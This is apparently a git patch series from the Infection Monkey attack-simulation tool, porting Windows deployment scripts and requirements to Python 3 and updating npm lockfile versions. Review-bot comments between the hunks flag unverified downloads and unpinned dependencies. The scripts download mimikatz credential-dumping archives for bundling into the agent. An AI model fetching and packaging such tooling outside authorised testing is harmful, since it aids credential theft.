From 9a21a50fd16a207fa278dedd0c1f1e0122aa1810 Mon Sep 17 00:00:00 2001
From: VakarisZ
Date: Thu, 26 Sep 2019 10:53:25 +0300
Subject: [PATCH 01/53] Windows deployment scripts to python3

---
 deployment_scripts/config.ps1 | 5 +----
 deployment_scripts/deploy_windows.ps1 | 13 ++++---------
 2 files changed, 5 insertions(+), 13 deletions(-)

diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1
index 07be64612..4fee48e09 100644
--- a/deployment_scripts/config.ps1
+++ b/deployment_scripts/config.ps1
@@ -3,7 +3,7 @@ $MONKEY_FOLDER_NAME = "infection_monkey"
 # Url of public git repository that contains monkey's source code
 $MONKEY_GIT_URL = "https://github.com/guardicore/monkey"
 # Link to the latest python download or install it manually
-$PYTHON_URL = "https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi"
+$PYTHON_URL = "https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe"
 
 # Monkey binaries
 $LINUX_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32"
@@ -33,14 +33,11 @@ $TEMP_CPP_INSTALLER = "cpp.exe"
 $TEMP_NPM_INSTALLER = "node.msi"
 $TEMP_PYWIN32_INSTALLER = "pywin32.exe"
 $TEMP_UPX_ZIP = "upx.zip"
-$TEMP_VC_FOR_PYTHON27_INSTALLER = "vcforpython.msi"
 $UPX_FOLDER = "upx394w"
 
 # Other url's
-$VC_FOR_PYTHON27_URL = "https://download.microsoft.com/download/7/9/6/796EF2E4-801B-4FC4-AB28-B59FBF6D907B/VCForPython27.msi"
 $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip"
 $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip"
-$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572"
 $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi"
 $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe"
 $UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip"
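Review bot: The new `$PYTHON_URL` names an installer that deploy_windows.ps1 downloads and immediately executes with `Start-Process`, and neither file pins a digest or checks the Authenticode signature, so a compromised mirror or an intercepted download on the build host becomes code execution as the deploying user. I would add a `$PYTHON_SHA256` next to the URL, populated from the checksum python.org publishes for this release, and have the deploy script compare `(Get-FileHash $TEMP_PYTHON_INSTALLER -Algorithm SHA256).Hash` against it before launching anything. Note also that this commit switches the download from an `.msi` to an `.exe` while the temp file name the script saves it under is not touched in this hunk; worth confirming the two agree.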
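Review bot: `$OPEN_SSL_URL`, a context line this hunk leaves in place, still fetches OpenSSL 1.0.2l from a third-party mirror (`indy.fulgan.com`) rather than from openssl.org or a distro package, and like the other downloads here it is unpacked and used without any checksum; 1.0.2l is a 2017 build and, as far as I recall, the 1.0.2 branch had several later security releases before end of life, so the pinned version deserves a review and a SHA-256 recorded next to the URL. On the new side `$PYWIN32_URL` also still names the `py2.7` build of pywin32 even though `$PYTHON_URL` now installs 3.7; that mismatch will surface when the deploy script tries to install it.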
diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1
index 17d08ecc8..1bfb62445 100644
--- a/deployment_scripts/deploy_windows.ps1
+++ b/deployment_scripts/deploy_windows.ps1
@@ -44,15 +44,15 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
 try {
 $version = cmd.exe /c '"python" --version 2>&1'
- if ( $version -like 'Python 2.7.*' ) {
- "Python 2.7.* was found, installing dependancies"
+ if ( $version -like 'Python 3.*' ) {
+ "Python 3.* was found, installing dependencies"
 } else {
 throw System.Management.Automation.CommandNotFoundException
 }
 }
 catch [System.Management.Automation.CommandNotFoundException] {
- "Downloading python 2.7 ..."
+ "Downloading python 3 ..."
 $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER)
 Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop
 $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
@@ -69,7 +69,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
 $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source)
 
 # Get vcforpython27 before installing requirements
- "Downloading Visual C++ Compiler for Python 2.7 ..."
+ "Downloading Visual C++ Compiler for Python 3 ..."
 $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER)
 Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop
 $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
@@ -115,11 +115,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
 "Removing zip file"
 Remove-Item $TEMP_OPEN_SSL_ZIP
 
- # Download and install C++ redistributable
- "Downloading C++ redistributable ..."
- $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER)
- Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop
- Remove-Item $TEMP_CPP_INSTALLER
 
 # Generate ssl certificate
 "Generating ssl certificate"
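Review bot: `Start-Process -Wait $TEMP_PYTHON_INSTALLER` runs whatever `$webClient.DownloadFile` just wrote, with no integrity check in between; before launching it I would verify a pinned digest, `if ((Get-FileHash $TEMP_PYTHON_INSTALLER -Algorithm SHA256).Hash -ne $PYTHON_SHA256) { throw "python installer hash mismatch" }`, or at least require a valid Authenticode signature via `Get-AuthenticodeSignature`. The loosened test `'Python 3.*'` also accepts any 3.x interpreter, whereas the rest of this series targets 3.7 specifically (the pywin32 build chosen later in config.ps1 is for py3.7), so a host with an older 3.x on PATH passes this check and fails later in pip; matching `'Python 3.7.*'` would fail fast. The enclosing Deploy-Windows function begins before and continues after this hunk.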
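Review bot: This hunk only relabels the message, but `$VC_FOR_PYTHON27_URL` and `$TEMP_VC_FOR_PYTHON27_INSTALLER` are deleted from config.ps1 in the same commit, so on the new side `$webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER)` is invoked with two empty values and should throw here, before the `-ErrorAction Stop` on the next line is even reached. Either drop this block together with the config entries, or point it at the Visual C++ build tools that Python 3.7 extensions actually need; the "Compiler for Python 2.7" package does not apply to 3.x. The surrounding function continues outside the hunk.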
From 2af17bc37193e6d1dad4addf0146265e67566199 Mon Sep 17 00:00:00 2001
From: VakarisZ
Date: Wed, 2 Oct 2019 10:15:53 +0300
Subject: [PATCH 02/53] Windows deployment scripts to python3

---
 deployment_scripts/config.ps1 | 18 +++++-------
 deployment_scripts/deploy_windows.ps1 | 35 +++++------------------
 monkey/infection_monkey/build_windows.bat | 2 +-
 monkey/infection_monkey/monkey.spec | 12 +-------
 monkey/monkey_island/requirements.txt | 4 +--
 5 files changed, 18 insertions(+), 53 deletions(-)

diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1
index 4fee48e09..a3dafc66e 100644
--- a/deployment_scripts/config.ps1
+++ b/deployment_scripts/config.ps1
@@ -22,24 +22,20 @@ $SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so"
 # Other directories and paths ( most likely you dont need to configure)
 $MONKEY_ISLAND_DIR = "\monkey\monkey_island"
 $MONKEY_DIR = "\monkey\infection_monkey"
-$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner"
+$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\bin"
 $PYTHON_DLL = "C:\Windows\System32\python27.dll"
-$MK32_DLL = "mk32.dll"
-$MK64_DLL = "mk64.dll"
-$TEMP_PYTHON_INSTALLER = ".\python.msi"
+$MK32_DLL = "mk32.zip"
+$MK64_DLL = "mk64.zip"
+$TEMP_PYTHON_INSTALLER = ".\python.exe"
 $TEMP_MONGODB_ZIP = ".\mongodb.zip"
 $TEMP_OPEN_SSL_ZIP = ".\openssl.zip"
-$TEMP_CPP_INSTALLER = "cpp.exe"
 $TEMP_NPM_INSTALLER = "node.msi"
 $TEMP_PYWIN32_INSTALLER = "pywin32.exe"
-$TEMP_UPX_ZIP = "upx.zip"
-$UPX_FOLDER = "upx394w"
 
 # Other url's
 $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip"
 $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip"
 $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi"
-$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe"
-$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip"
-$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.dll"
-$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.dll"
+$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe"
+$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip"
+$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip"
diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1
index 1bfb62445..c7192a4c8 100644
--- a/deployment_scripts/deploy_windows.ps1
+++ b/deployment_scripts/deploy_windows.ps1
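Review bot: `$PYTHON_DLL = "C:\Windows\System32\python27.dll"` is carried over unchanged while every other Python reference in this hunk moves to 3.7 (`pywin32-225...py3.7.exe`, `.\python.exe`), so whatever consumes that variable now points at a 2.7 runtime this script no longer installs; it should become the 3.7 DLL or be dropped — its consumer is not visible here, so please confirm. Separately, `$MK32_DLL`/`$MK64_DLL` now hold zip archive names, so a rename such as `$MK32_ZIP` would stop the `_DLL` suffix from misleading, and like the other downloads the mimikatz archives are fetched from a release tag with no pinned digest even though their contents end up inside the agent.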
@@ -53,6 +53,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
 catch [System.Management.Automation.CommandNotFoundException] {
 "Downloading python 3 ..."
+ "Select 'add to PATH' when installing"
 $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER)
 Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop
 $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
@@ -60,23 +61,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
 # Check if installed correctly
 $version = cmd.exe /c '"python" --version 2>&1'
 if ( $version -like '* is not recognized*' ) {
- "Python is not found in PATH. Add it manually or reinstall python."
+ "Python is not found in PATH. If you just installed python you need to restart cmd.
+ Else, add it manually or reinstall python."
 return
 }
 }
 
- # Set python home dir
- $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source)
-
- # Get vcforpython27 before installing requirements
- "Downloading Visual C++ Compiler for Python 3 ..."
- $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER)
- Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop
- $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
- Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER
-
- # Install requirements for island
- $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop
 "Upgrading pip..."
 $output = cmd.exe /c 'python -m pip install --user --upgrade pip 2>&1'
 $output
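Review bot: The installer is still launched interactively and the new message asks the user to tick "add to PATH", which is exactly the condition the check further down then has to detect after the fact; the Python 3 executable installer accepts unattended switches, so `Start-Process -Wait $TEMP_PYTHON_INSTALLER -ArgumentList '/quiet','PrependPath=1' -ErrorAction Stop` makes the deployment reproducible and removes the prompt. Whichever way it is launched, the file is executed straight after download with no hash or Authenticode check, which I would add before the `Start-Process` line. The try this catch belongs to starts before the hunk.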
@@ -84,8 +74,11 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
 "Make sure pip module is installed and re-run this script."
 return
 }
+
+ "Installing python packages for island"
+ $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop
 & python -m pip install --user -r $islandRequirements
- # Install requirements for monkey
+ "Installing python packages for monkey"
 $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt"
 & python -m pip install --user -r $monkeyRequirements
 
@@ -115,7 +108,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
 "Removing zip file"
 Remove-Item $TEMP_OPEN_SSL_ZIP
 
-
 # Generate ssl certificate
 "Generating ssl certificate"
 Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR)
@@ -167,19 +159,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
 $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin")
 New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue
 
- # Download upx
- if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){
- "Downloading upx ..."
- $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP)
- "Unzipping upx"
- Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue
- Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir
- # Remove unnecessary files
- Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER)
- "Removing zip file"
- Remove-Item $TEMP_UPX_ZIP
- }
-
 # Download mimikatz binaries
 $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL
 if(!(Test-Path -Path $mk32_path )){
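Review bot: Neither `& python -m pip install --user -r $islandRequirements` nor its monkey counterpart inspects `$LASTEXITCODE`, so a failed or partial install (a wheel that fails to build, a network error) is printed and then passed over, and the script carries on to fetch MongoDB as if the dependencies were in place; `if ($LASTEXITCODE -ne 0) { throw "pip install failed for $islandRequirements" }` after each call, mirroring the pip-upgrade step just above that already bails out, would fail fast. With `tornado` and `jsonschema` unpinned in the same commit, these two installs now also resolve to whatever is newest on PyPI at deploy time; see the requirements hunk. The enclosing function continues outside the hunk.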
diff --git a/monkey/infection_monkey/build_windows.bat b/monkey/infection_monkey/build_windows.bat
index e5ff5a805..e2bf2935e 100644
--- a/monkey/infection_monkey/build_windows.bat
+++ b/monkey/infection_monkey/build_windows.bat
@@ -1 +1 @@
-pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec
\ No newline at end of file
+pyinstaller -F --log-level=DEBUG --clean --noupx monkey.spec
diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec
index d29adddb1..e35fd2630 100644
--- a/monkey/infection_monkey/monkey.spec
+++ b/monkey/infection_monkey/monkey.spec
@@ -67,17 +67,11 @@ def process_datas(orig_datas):
 
 
 def get_binaries():
- binaries = get_windows_only_binaries() if is_windows() else get_linux_only_binaries()
+ binaries = [] if is_windows() else get_linux_only_binaries()
 binaries += get_sc_binaries()
 return binaries
 
 
-def get_windows_only_binaries():
- binaries = []
- binaries += get_msvcr()
- return binaries
-
-
 def get_linux_only_binaries():
 binaries = []
 binaries += get_traceroute_binaries()
@@ -92,10 +86,6 @@ def get_sc_binaries():
 return [(x, get_bin_file_path(x), 'BINARY') for x in ['sc_monkey_runner32.so', 'sc_monkey_runner64.so']]
 
 
-def get_msvcr():
- return [('msvcr100.dll', os.environ['WINDIR'] + '\\system32\\msvcr100.dll', 'BINARY')]
-
-
 def get_traceroute_binaries():
 traceroute_name = 'traceroute32' if is_32_bit() else 'traceroute64'
 return [(traceroute_name, get_bin_file_path(traceroute_name), 'BINARY')]
diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt
index e6d81e6aa..57ca79348 100644
--- a/monkey/monkey_island/requirements.txt
+++ b/monkey/monkey_island/requirements.txt
@@ -1,6 +1,6 @@
 bson
 python-dateutil
-tornado==5.1.1
+tornado
 werkzeug
 jinja2
 markupsafe
@@ -10,7 +10,7 @@ flask
 Flask-Pymongo
 Flask-Restful
 Flask-JWT
-jsonschema==2.6.0
+jsonschema
 netifaces
 ipaddress
 enum34
From fabcd4c9df0ac77e3ac45821ba81a7bab3164741 Mon Sep 17 00:00:00 2001
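Review bot: Dropping `==5.1.1` and `==2.6.0` turns `tornado` and `jsonschema` into floating dependencies, so each deployment resolves whatever is newest on PyPI at that moment: the island build stops being reproducible and a breaking or malicious release is picked up automatically. If the old pins do not install on Python 3.7, re-pin to the versions that were actually validated with this series rather than removing the constraint, or move the project to a constraints file with hashes (`pip install --require-hashes`). The other unpinned lines in this file carry the same exposure, but they are not touched by this commit.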
From: VakarisZ Date: Thu, 3 Oct 2019 12:40:58 +0300 Subject: [PATCH 03/53] Removed enum34 from requirements --- .../infection_monkey/requirements_windows.txt | 2 - monkey/monkey_island/cc/ui/package-lock.json | 101 +++++++++--------- monkey/monkey_island/cc/ui/package.json | 14 +-- monkey/monkey_island/requirements.txt | 1 - 4 files changed, 57 insertions(+), 61 deletions(-) diff --git a/monkey/infection_monkey/requirements_windows.txt b/monkey/infection_monkey/requirements_windows.txt index ce5021923..cb3f43660 100644 --- a/monkey/infection_monkey/requirements_windows.txt +++ b/monkey/infection_monkey/requirements_windows.txt @@ -1,4 +1,3 @@ -enum34 impacket pycryptodome cffi @@ -15,4 +14,3 @@ wmi pywin32 pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/cc/ui/package-lock.json b/monkey/monkey_island/cc/ui/package-lock.json index 14e547416..b402cad83 100644 --- a/monkey/monkey_island/cc/ui/package-lock.json +++ b/monkey/monkey_island/cc/ui/package-lock.json @@ -2731,7 +2731,7 @@ "dev": true, "requires": { "bluebird": "3.5.5", - "chownr": "1.1.2", + "chownr": "1.1.3", "figgy-pudding": "3.5.1", "glob": "7.1.4", "graceful-fs": "4.2.2", @@ -2759,7 +2759,7 @@ "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", "dev": true, "requires": { - "yallist": "3.0.3" + "yallist": "3.1.1" } }, "y18n": { @@ -2769,9 +2769,9 @@ "dev": true }, "yallist": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.0.3.tgz", - "integrity": "sha512-S+Zk8DEWE6oKpV+vI3qWkaK+jSbIK86pCwe2IF/xwIpQ8jEuxpw9NyaGjmp9+BoJv5FV2piqCDcoCtStppiq2A==", + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", + "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", "dev": true } } 
@@ -2945,9 +2945,9 @@ } }, "chownr": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.2.tgz", - "integrity": "sha512-GkfeAQh+QNy3wquu9oIZr6SS5x7wGdSgNQvD10X3r+AZr1Oys22HW8kAmDMvNg2+Dm0TeGaEuO8gFwdBXxwO8A==", + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.3.tgz", + "integrity": "sha512-i70fVHhmV3DtTl6nqvZOnIjbY0Pe4kAUjwHj8z0zAdgBtYrJyYwLKCCuRBQ5ppkyL0AkN7HKRnETdmdp1zqNXw==", "dev": true }, "chrome-trace-event": { @@ -5117,9 +5117,9 @@ } }, "eslint-plugin-react": { - "version": "7.14.3", - "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.14.3.tgz", - "integrity": "sha512-EzdyyBWC4Uz2hPYBiEJrKCUi2Fn+BJ9B/pJQcjw5X+x/H2Nm59S4MJIvL4O5NEE0+WbnQwEBxWY03oUk+Bc3FA==", + "version": "7.15.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.15.1.tgz", + "integrity": "sha512-YotSItgMPwLGlr3df44MGVyXnHkmKcpkHTzpte3QwJtocr3nFqCXCuoxFZeBtnT8RHdj038NlTvam3dcAFrMcA==", "dev": true, "requires": { "array-includes": "3.0.3", @@ -5652,9 +5652,9 @@ "optional": true }, "filepond": { - "version": "4.7.1", - "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.1.tgz", - "integrity": "sha512-AxZBhsGS9QEJfbLiASUJMuS3hLhq/HbkKaJx1gKYCQ0lbs/OfciKKdeFbtAVKk0o9o6DcITw2C+QqFcTP1QBCg==" + "version": "4.7.2", + "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.2.tgz", + "integrity": "sha512-OqG35MnmvrGnq2KgHO0PS8uujzRqQL/bMlSy0StqRn6RRAM6wBM9gzQl22IvWLwMyw6g8aIZTZAhMaiTS1LZsA==" }, "fill-range": { "version": "2.2.3", @@ -6362,7 +6362,7 @@ "bundled": true, "dev": true, "requires": { - "inherits": "~2.0.0" + "inherits": "2.0.3" } }, "boom": { @@ -6485,7 +6485,7 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "extend": { 
@@ -6695,14 +6695,13 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "jsbn": { "version": "0.1.1", "bundled": true, - "dev": true, - "optional": true + "dev": true }, "json-schema": { "version": "0.2.3", @@ -6716,7 +6715,7 @@ "dev": true, "optional": true, "requires": { - "jsonify": "~0.0.0" + "jsonify": "0.0.0" } }, "json-stringify-safe": { @@ -15577,9 +15576,9 @@ } }, "react": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react/-/react-16.9.0.tgz", - "integrity": "sha512-+7LQnFBwkiw+BobzOF6N//BdoNw0ouwmSJTEm9cglOOmsg/TMiFHZLe2sEoN5M7LgJTj9oHH0gxklfnQe66S1w==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react/-/react-16.10.1.tgz", + "integrity": "sha512-2bisHwMhxQ3XQz4LiJJwG3360pY965pTl/MRrZYxIBKVj4fOHoDs5aZAkYXGxDRO1Li+SyjTAilQEbOmtQJHzA==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", @@ -15667,14 +15666,14 @@ } }, "react-dom": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.9.0.tgz", - "integrity": "sha512-YFT2rxO9hM70ewk9jq0y6sQk8cL02xm4+IzYBz75CQGlClQQ1Bxq0nhHF6OtSbit+AIahujJgb/CPRibFkMNJQ==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.10.1.tgz", + "integrity": "sha512-SmM4ZW0uug0rn95U8uqr52I7UdNf6wdGLeXDmNLfg3y5q5H9eAbdjF5ubQc3bjDyRrvdAB2IKG7X0GzSpnn5Mg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", "prop-types": "15.7.2", - "scheduler": "0.15.0" + "scheduler": "0.16.1" } }, "react-event-timeline": { 
@@ -15719,9 +15718,9 @@ } }, "react-hot-loader": { - "version": "4.12.13", - "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.13.tgz", - "integrity": "sha512-4Byk3aVQhcmTnVCBvDHOEOUnMFMj81r2yRKZQSfLOG2yd/4hm/A3oK15AnCZilQExqSFSsHcK64lIIU+dU2zQQ==", + "version": "4.12.14", + "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.14.tgz", + "integrity": "sha512-ecxH4eBvEaJ9onT8vkEmK1FAAJUh1PqzGqds9S3k+GeihSp7nKAp4fOxytO+Ghr491LiBD38jaKyDXYnnpI9pQ==", "dev": true, "requires": { "fast-levenshtein": "2.0.6", @@ -15746,7 +15745,7 @@ "integrity": "sha512-0XsbTXxgiaCDYDIWFcwkmerZPSwywfUqYmwT4jzewKTQSWoE6FCMoUVOeBJWK3E/CrWbxRG3m5GzY4lnIwGRBA==", "dev": true, "requires": { - "react-is": "16.9.0" + "react-is": "16.10.1" } }, "json5": { @@ -15770,9 +15769,9 @@ } }, "react-is": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.9.0.tgz", - "integrity": "sha512-tJBzzzIgnnRfEm046qRcURvwQnZVXmuCbscxUO5RWrGTXpon2d4c8mI0D8WE6ydVIm29JiLB6+RslkIvym9Rjw==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.10.1.tgz", + "integrity": "sha512-BXUMf9sIOPXXZWqr7+c5SeOKJykyVr2u0UDzEf4LNGc6taGkQe1A9DFD07umCIXz45RLr9oAAwZbAJ0Pkknfaw==", "dev": true }, "source-map": { @@ -16008,9 +16007,9 @@ } }, "react-toggle": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.0.2.tgz", - "integrity": "sha512-EPTWnN7gQHgEAUEmjheanZXNzY5TPnQeyyHfEs3YshaiWZf5WNjfYDrglO5F1Hl/dNveX18i4l0grTEsYH2Ccw==", + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.1.1.tgz", + "integrity": "sha512-+wXlMcSpg8SmnIXauMaZiKpR+r2wp2gMUteroejp2UTSqGTVvZLN+m9EhMzFARBKEw7KpQOwzCyfzeHeAndQGw==", "requires": { "classnames": "2.2.6" } 
@@ -16706,9 +16705,9 @@ } }, "scheduler": { - "version": "0.15.0", - "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.15.0.tgz", - "integrity": "sha512-xAefmSfN6jqAa7Kuq7LIJY0bwAPG3xlCj0HMEBQk1lxYiDKZscY2xJ5U/61ZTrYbmNQbXa+gc7czPkVo11tnCg==", + "version": "0.16.1", + "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.16.1.tgz", + "integrity": "sha512-MIuie7SgsqMYOdCXVFZa8SKoNorJZUWHW8dPgto7uEHn1lX3fg2Gu0TzgK8USj76uxV7vB5eRMnZs/cdEHg+cg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1" @@ -17936,20 +17935,20 @@ } }, "terser": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.1.tgz", - "integrity": "sha512-pnzH6dnFEsR2aa2SJaKb1uSCl3QmIsJ8dEkj0Fky+2AwMMcC9doMqLOQIH6wVTEKaVfKVvLSk5qxPBEZT9mywg==", + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.4.tgz", + "integrity": "sha512-Kcrn3RiW8NtHBP0ssOAzwa2MsIRQ8lJWiBG/K7JgqPlomA3mtb2DEmp4/hrUA+Jujx+WZ02zqd7GYD+QRBB/2Q==", "dev": true, "requires": { - "commander": "2.20.0", + "commander": "2.20.1", "source-map": "0.6.1", "source-map-support": "0.5.13" }, "dependencies": { "commander": { - "version": "2.20.0", - "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.0.tgz", - "integrity": "sha512-7j2y+40w61zy6YC2iRNpUe/NwhNyoXrYpHMrSunaMG64nRnaf96zO/KMQR4OyN/UnE5KLyEBnKHd4aG3rskjpQ==", + "version": "2.20.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.1.tgz", + "integrity": "sha512-cCuLsMhJeWQ/ZpsFTbE765kvVfoeSddc4nU3up4fV+fDBcfUXnbITJ+JzhkdjzOqhURjZgujxaioam4RM9yGUg==", "dev": true }, "source-map": { @@ -17982,7 +17981,7 @@ "schema-utils": "1.0.0", "serialize-javascript": "1.9.1", "source-map": "0.6.1", - "terser": "4.3.1", + "terser": "4.3.4", "webpack-sources": "1.4.3", "worker-farm": "1.7.0" }, 
@@ -19710,9 +19709,9 @@ } }, "webpack": { - "version": "4.40.2", - "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.40.2.tgz", - "integrity": "sha512-5nIvteTDCUws2DVvP9Qe+JPla7kWPPIDFZv55To7IycHWZ+Z5qBdaBYPyuXWdhggTufZkQwfIK+5rKQTVovm2A==", + "version": "4.41.0", + "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.41.0.tgz", + "integrity": "sha512-yNV98U4r7wX1VJAj5kyMsu36T8RPPQntcb5fJLOsMz/pt/WrKC0Vp1bAlqPLkA1LegSwQwf6P+kAbyhRKVQ72g==", "dev": true, "requires": { "@webassemblyjs/ast": "1.8.5", diff --git a/monkey/monkey_island/cc/ui/package.json b/monkey/monkey_island/cc/ui/package.json index aa85164ce..6743638d5 100644 --- a/monkey/monkey_island/cc/ui/package.json +++ b/monkey/monkey_island/cc/ui/package.json @@ -37,7 +37,7 @@ "css-loader": "^1.0.1", "eslint": "^5.16.0", "eslint-loader": "^2.2.1", - "eslint-plugin-react": "^7.14.3", + "eslint-plugin-react": "^7.15.1", "file-loader": "^1.1.11", "glob": "^7.1.4", "html-loader": "^0.5.5", @@ -56,11 +56,11 @@ "phantomjs-prebuilt": "^2.1.16", "react-addons-test-utils": "^15.6.2", "react-event-timeline": 